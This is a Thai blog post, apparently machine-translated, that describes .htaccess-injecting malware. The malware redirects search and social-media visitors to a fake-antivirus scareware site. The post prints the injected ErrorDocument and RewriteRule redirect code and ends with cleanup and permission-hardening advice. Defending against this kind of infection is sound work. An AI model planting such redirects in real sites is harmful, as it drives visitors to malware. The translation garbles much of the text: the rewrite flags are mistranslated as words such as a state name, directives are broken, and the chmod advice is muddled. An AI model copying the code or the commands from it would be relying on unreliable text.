มัลแวร์ / ไวรัส - .htaccess "เขียนซ้ำ" และเปลี่ยนเส้นทาง

รูปแบบใหม่ของไวรัส ซึ่งผมมองไม่ทราบมากส่งผลกระทบต่อเว็บไซต์ที่โฮสต์บน เซิร์ฟเวอร์ที่ไม่ปลอดภัย โดยที่บัญชีผู้ใช้ / บัญชีโดเมนย่อยสามารถ "เห็น" ระหว่างบัญชีเหล่านี้ได้ โดยเฉพาะอย่างยิ่งบัญชีโฮสติ้งทั้งหมดจะอยู่ในโฟลเดอร์ "vhosts“ และสิทธิในการเขียนของ โฟลเดอร์ของผู้ใช้ ของ "vhosts" มอบให้กับผู้ใช้ทั่วไป ... โดยผู้ค้าปลีกในสถานการณ์ส่วนใหญ่ เป็นวิธีการทั่วไปของเว็บเซิร์ฟเวอร์ที่ไม่ใช้ WHM / cPanel.

การกระทำของไวรัส. htaccess -. htaccess hack

ไวรัส ส่งผลกระทบต่อไฟล์ .htaccess เว็บไซต์ของเหยื่อ เส้นที่มีการเพิ่ม / คำสั่ง ไปยัง เปลี่ยนผู้เข้าชม (มาจาก yahoo, msn, google, facebook, yaindex, twitter, myspace ฯลฯ ไซต์และพอร์ทัลที่มีการเข้าชมสูง) ไปยังบางไซต์ที่มี "โปรแกรมป้องกันไวรัส“. มันเป็นเรื่องของ โซลูชั่นป้องกันไวรัสปลอมเกี่ยวกับการที่ผมเขียนในเบื้องต้นเกี่ยวกับ .

นี่คือสิ่งที่ดูเหมือนว่า .htaccess ได้รับผลกระทบ (ไม่สามารถเข้าถึง URL ที่บรรทัดเนื้อหาดังต่อไปนี้)

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

RewriteEngine เปิด

RewriteCond% {} HTTP_REFERER. * Yandex. * $ [อร์ทแคโรไลนา, OR]
RewriteCond% {} HTTP_REFERER. * Odnoklassniki. * $ [อร์ทแคโรไลนา, OR]
RewriteCond% {} HTTP_REFERER. * Vkontakte. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Rambler. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. หลอด *. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * วิกิพีเดีย. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Blogger. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Baidu. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Qq.com. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Myspace. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Twitter. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Facebook. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Google. * $ [อร์ทแคโรไลนา, OR]
RewriteCond% {} HTTP_REFERER. อยู่ *. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Aol. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Bing. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. Msn *. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * อเมซอน. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. อีเบย์ *. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * LinkedIn. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Flickr. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * LiveJasmin. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. Soso *. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * DoubleClick. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * ตัดผ่าน. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Orkut. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * LiveJournal. * $ [NC, OR]
RewriteCond% {HTTP_REFERER} *wordpress. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * yahoo. * $ [อร์ทแคโรไลนา, OR]
RewriteCond% {} HTTP_REFERER. * ถาม. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Excite. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * AltaVista. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. Msn *. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Netscape. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Hotbot. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. ไปที่ *. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Infoseek. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Mamma. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * AllTheWeb. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Lycos. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * ค้นหา. * $ [NC, OR]
RewriteCond %{HTTP_REFERER} .*เมตาrawler.*$ [NC,OR]
RewriteCond% {} HTTP_REFERER. * จดหมาย. * $ [NC, OR]
RewriteCond% {} HTTP_REFERER. * Dogpile. * $ [NC]

RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = r [R, L]

RewriteCond% {REQUEST_FILENAME}! f-
RewriteCond% {REQUEST_FILENAME}-d
เขียนใหม่ %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = 4 [R, L]

ผู้ที่ใช้ WordPress พวกเขาจะพบบรรทัดเหล่านี้ในไฟล์ .htaccess จาก public_html. นอกจากนี้ไวรัสสร้าง Htaccess ในโฟลเดอร์เดียวกัน. wp เนื้อหา.

*มีสถานการณ์ที่ปรากฏขึ้นแทน peoriavascularsurgery.com เป็น dns.thesoulfoodcafe.com หรือที่อยู่อื่น ๆ

สิ่งที่ทำให้เชื้อไวรัสนี้

เปลี่ยนเส้นทางเมื่อผู้เข้าชมจะได้รับการต้อนรับด้วยอาวุธเปิดด้วยข้อความ:

คำเตือน!
คอมพิวเตอร์ของคุณมีสัญญาณต่างๆของไวรัสและโปรแกรมมัลแวร์ ของคุณ system ต้องตรวจสอบการป้องกันไวรัสทันที!
System การรักษาความปลอดภัยจะทำการสแกนพีซีของคุณอย่างรวดเร็วและฟรีเพื่อหาไวรัสและโปรแกรมที่เป็นอันตราย

มัลแวร์ฮิต

ไม่ว่าเราจะกดปุ่มใดเราจะนำไปที่หน้า "คอมพิวเตอร์ของฉัน", สร้างเลียนแบบ ออกแบบ XP. นี่คือจุดที่ "กระบวนการสแกน" เริ่มต้นโดยอัตโนมัติในตอนท้ายซึ่งเราพบว่า "เราติดไวรัส"

มัลแวร์ฮิต

หลังจากที่คุณคลิกตกลงหรือยกเลิกก็จะเริ่มต้น ดาวน์โหลดไฟล์ setup.exe. นี้ setup.exe เป็นโปรแกรมป้องกันไวรัสปลอม ส่งผลกระทบต่อระบบ จะติดตั้งชุดของมัลแวร์ที่แพร่กระจายไวรัสการเชื่อมโยงต่อไปและนอกจากนี้ ซอฟแวร์ป้องกันไวรัส (ปลอมด้วย) ที่เหยื่อได้รับเชิญให้ซื้อ.
บรรดาผู้ที่ได้รับการติดต่อแล้วรูปแบบของไวรัสนี้สามารถใช้ . นอกจากนี้ยังแนะนำให้สแกนทั้งฮาร์ดดิสก์ แนะนำ Kaspersky Internet Security หรือ Kaspersky Anti-Virus.

ประเภทของไวรัสนี้มีผลต่อระบบปฏิบัติการของผู้เข้าชมระบบปฏิบัติการ Windows XP, Windows ME Windows 2000, Windows NT, Windows 98 si Windows 95 จนถึงขณะนี้ยังไม่ทราบกรณีการติดเชื้อของระบบปฏิบัติการ Windows เห็นใช่ Windows 7.

วิธีที่เราสามารถกำจัดไวรัสนี้แฟ้ม Htaccess. บนเซิร์ฟเวอร์และวิธีการป้องกันการติดเชื้อ

1. วิเคราะห์ไฟล์ที่น่าสงสัยและลบรหัส เพื่อให้มั่นใจว่าไฟล์ได้รับผลกระทบไม่เพียง แต่ .htaccess จะดีกว่า วิเคราะห์ไฟล์ทั้งหมด . Php si . Js.

ฮิต เขียนแฟ้ม. Htaccess และมันตั้ง chmod 644 หรือ 744 ด้วยการเข้าถึงการเขียนเพียง ผู้ใช้เจ้าของ.

ฮิต เมื่อมีการสร้างบัญชีผู้ใช้โฮสติ้งสำหรับโฟลเดอร์เว็บไซต์ / หน้าแรก หรือ / Webroot นี้จะสร้างโฟลเดอร์ซึ่งมักจะมีชื่อของผู้ใช้โดยอัตโนมัติ (ผู้ใช้สามารถ cPanel, FTP, ฯลฯ ) เพื่อป้องกันการเขียนข้อมูลและการส่งไวรัสจากผู้ใช้คนหนึ่งไปยังอีกที่จะแนะนำว่าโฟลเดอร์ผู้ใช้แต่ละคนจะต้องตั้ง:

chmod ระบุ 644 หรือ 744, 755 – 644
chown -R ชื่อผู้ใช้ folder_name
chgrp-R nume_user nume_folder

คำสั่ง ls ทั้งหมด เพื่อตรวจสอบว่ารูปแบบที่ทำอย่างถูกต้อง ควรจะปรากฏสิ่งที่ชอบ

drwx - x - x 12 dinamics dinamics 4096 6 พฤษภาคม 14:51 dinamics /
drwx - x - x 10 duran duran 4096 7 มี.ค. 07:46 duran /
drwx - x - x 12 หลอดทดลองหลอดทดลอง 4096 29 ม.ค. 11 23:XNUMX หลอดทดลอง /
drwxr-xr-x 14 express express 4096 26 กุมภาพันธ์ 2009 ด่วน /
drwxr-xr-x 9 ezo ezo 4096 19 พฤษภาคม 01:09 ezo /
drwx - x - x 9 farma farma 4096 ธ.ค. 19 22:29 farma /

หากหนึ่งในข้างต้นจะ use​​rele FTP ไฟล์ที่ติดเชื้อมันไม่สามารถส่งไวรัสไปยังพื้นที่ผู้ใช้อื่น มันเป็นสุทธิความปลอดภัยขั้นต่ำที่จะปกป้องบัญชีพื้นที่บนเว็บเซิร์ฟเวอร์

องค์ประกอบทั่วไปของพื้นที่ที่ได้รับผลกระทบตามประเภทของไวรัสนี้

โดเมนที่ได้รับผลกระทบทั้งหมดเปลี่ยนเส้นทางผู้เยี่ยมชมไปยังไซต์ที่มีชื่อโดเมน "/main.php? s = 4 & H"

นี้ "ไวรัส htaccess.” ส่งผลต่อ CMS ทุกประเภท (จูมล่า WordPress,phpBBฯลฯ ) ที่ใช้ .htaccess

.htaccess Virus Hack & Redirect.

ผู้ก่อตั้งและบรรณาธิการ Stealth Settingsตั้งแต่ปี พ.ศ.2006 จนถึงปัจจุบัน มีประสบการณ์ด้านระบบปฏิบัติการ Linux (โดยเฉพาะอย่างยิ่ง CentOS), Mac OS X, Windows XP> Windows 10 si WordPress (CMS)

วิธีการ » การป้องกันไวรัสและความปลอดภัย » มัลแวร์ / ไวรัส - .htaccess "เขียนซ้ำ" และเปลี่ยนเส้นทาง
แสดงความคิดเห็น